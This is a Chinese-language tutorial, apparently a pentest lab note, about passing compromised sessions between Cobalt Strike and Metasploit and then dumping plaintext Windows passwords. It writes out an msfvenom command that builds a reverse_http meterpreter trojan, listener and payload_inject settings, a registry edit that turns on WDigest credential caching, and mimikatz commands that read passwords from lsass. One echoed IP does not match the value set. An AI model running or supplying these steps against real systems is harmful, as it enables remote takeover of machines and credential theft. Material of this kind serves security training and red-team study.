cobalt strike 與 metasploit 互傳許可權
1.cobalt傳遞許可權給msf
啟動server端
./teamserver [監聽地址] [密碼]
使用客戶端連線:
生成一個監聽器
在5555埠 服務端上監聽
生成後門 可以選擇以上幾種
選擇interact 模組進行利用
先生成一個外部http監聽器
這裡填寫msf主機所監聽的埠和IP
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.80.128
lhost => 192.168.80.128
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
run
使用msf監聽對應主機與埠
進行許可權傳遞 使用spawn模組
選擇
成功將許可權傳遞給msf
總結一下 cs客戶端生成木馬 伺服器監聽對應地址與埠 等待目標主機上線 上線後 在msf主機上監聽對應埠與IP 然後cs生成一個外部監聽器 將會話派生一個給msf
2.msf傳遞許可權給cobalt
使用msf生成木馬:
msfvenom -p windows/meterpreter/reverse_http lhost=192.168.80.128 lport=8888 -f exe >> msf_shell.exe
這是一個反向連結的http木馬 透過監聽本地 8888埠來反鏈目標主機 傳遞資料
然後開啟msf控制檯監聽埠與地址
使用windows/local/payloads_inject模組將許可權傳遞給cs
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.80.133
lhost => 192.168.80.1
msf6 exploit(windows/local/payload_inject) > set lport 8855
lport => 8855
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
用cobalt生成一個監聽器 監聽服務端 埠和ip與msf一致
成功互傳許可權
mimikatz抓取明文密碼
windows 在傳遞密碼時一般使用hash 但在第一次傳遞密碼時 需要一個程式將目標處理變成hash
這時就可以在該程序(lsass)中抓取明文密碼
存在前置條件:登錄檔中UseLogonCredential項必須為1
這個是該項的具體位置HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest
可以使用shell對該值進行修改
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
並且密碼只能在使用者登入時才能抓取
mimikatz.exe privilege::debug
抓取明文密碼
成功